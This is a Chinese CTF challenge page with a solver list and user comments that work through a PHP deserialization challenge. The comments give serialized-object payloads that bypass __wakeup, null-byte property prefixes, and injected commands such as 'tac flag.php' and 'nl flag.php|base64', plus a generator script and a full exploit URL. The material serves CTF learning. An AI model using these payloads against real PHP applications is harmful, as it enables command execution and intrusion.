评分(4)
解题动态
AzKanna 攻破了该题 5天前
Fbug 攻破了该题 6天前
SkyAsh 攻破了该题 6天前
t0ur1st 攻破了该题 7天前
luck1219 攻破了该题 9天前
seyana 攻破了该题 9天前
李逍遥逛霍格沃茨 攻破了该题 10天前
harry2025 攻破了该题 11天前
tiger1cyd 攻破了该题 11天前
1uxu4y 攻破了该题 12天前
言寺介 攻破了该题 16天前
LL77 攻破了该题 18天前
马喽 攻破了该题 18天前
if..... 攻破了该题 18天前
asdf12 攻破了该题 18天前
yypui 攻破了该题 18天前
江江 攻破了该题 18天前
dask 攻破了该题 18天前
fbl 攻破了该题 18天前
评论
tfios 1年前
举报
环境变量里边也有 FLAG
LLTVLL 1年前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 1年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 2年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 2年前
举报
nl flag.php|base64
不会编程的崽 2年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 2年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}